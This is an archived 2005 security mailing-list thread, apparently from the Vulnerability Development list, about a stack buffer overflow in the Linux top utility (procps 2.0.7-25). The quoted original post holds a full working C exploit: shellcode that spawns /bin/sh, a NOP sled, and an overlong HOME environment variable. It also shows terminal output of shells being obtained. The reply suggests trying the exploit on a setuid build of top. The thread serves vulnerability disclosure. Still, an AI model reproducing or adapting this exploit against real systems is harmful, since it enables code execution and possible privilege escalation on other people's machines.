Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: Re: top (procps-2.0.7-25) vulnerability

Re: top (procps-2.0.7-25) vulnerability

From: KF (lists) <kf_lists_at_digitalmunition.com>
Date: Mon, 09 May 2005 11:36:09 -0400

Sheesh what is with top and folks not fixing OLD arse bugs. =]

You may wanna check with William LeFebvre and make sure this issue is
fixed in his latest code base.

Sun freeware ships top as setuid... you may wanna try to exploit this
bug there. It *may* not be fixed.

Look familiar?
http://www.securiteam.com/exploits/5JP0A2A2BW.html

-KF

WINNY THOMAS wrote:

>While running top on a tool of mine to do a profiling
>test the top command ran into a segmentation fault. I
>could find two instance where the command could
>misbehave
>
>1. if you have junk data inside a
>file .toprc in your home directory
>2. if your environmental variable
>HOME is set to a string that’s greater than 1024.
>
>I managed to spawn a shell out of top command by
>exploiting the second issue. If you compile and run
>the exploit code which I am including in the mail body
>you will get a shell. Incase you don’t you could pass
>parameters to the program as follows to adjust the
>offset.
>The vulnerability detail is included in the code
>comment
>
>[winnythomas_at_r8 WinnyThomas]$ ./putshellcode 1001
>sh-2.05b$ exit
>exit
>[winnythomas_at_r8 WinnyThomas]$ ./putshellcode 120
>Illegal instruction
>[winnythomas_at_r8 WinnyThomas]$ ./putshellcode 1010
>sh-2.05b$ exit
>exit
>
>in most of the test I did on the vulnerable code I got
>shell on my system without passing any parameter to
>the program (that is the hardcoded offset of 1111 in
>my program worked well on my system)
>
>/*
> * Program: Proof of concept code for top exploit
> * Author: Winny Thomas, Nevis networks pune
> * Vulerability: in top.c the function get_options
>uses strcpy to copy the value of the
> * environment variable HOME into a static buffer that
>is allocated on the stack. hence
> * its possible to apply standard stack smashing
>attack to overwrite the return address
> * on the stack and execute a code which is of the
>attackers choice
> * NOTE: top is not setuid and hence the exploit wont
>spawn a root shell.
> * Tested on Red Hat 8 with procps verion 2.0.7-25.
>the problem has
> * been fixed in the latest versions
> *
> * This code is for educational purpose only and the
> * author shall not bear any responsibility for any
> * damage caused by using this code
> */
>
>#include <stdio.h>
>#include <stdlib.h>
>
>char shellcode[] =
>"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
>
>char exploit_variable[1200];
>
>long get_esp(void)
>{
> __asm__("movl %esp, %eax");
>}
>
>int main(int argc, char *argv[])
>{
> long stackp, retaddr;
> char SETENV[1250];
> long *ptr;
> int i, j, offset = 1111;
>
> if (argc > 1)
> offset = atoi(argv[1]);
>
> stackp = get_esp();
> retaddr = stackp - offset;
>
> ptr = exploit_variable;
> for (i = 0; i < 1200; i += 4)
> *ptr++ = retaddr;
>
> for (i = 0; i < 600; i++)
> exploit_variable[i] = '\x90';
>
> for (j = 0 ;j < strlen(shellcode); j++, i++)
> exploit_variable[i] = shellcode[j];
>
> sprintf(SETENV, "HOME=");
> strcat(SETENV, exploit_variable);
> putenv(SETENV);
> execl("/usr/bin/top", "top", (char *)0);
>}
>
>
>
>
>
>
>__________________________________
>Do you Yahoo!?
>Make Yahoo! your home page
>http://www.yahoo.com/r/hs
>
>
>
>
>
Received on May 10 2005

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos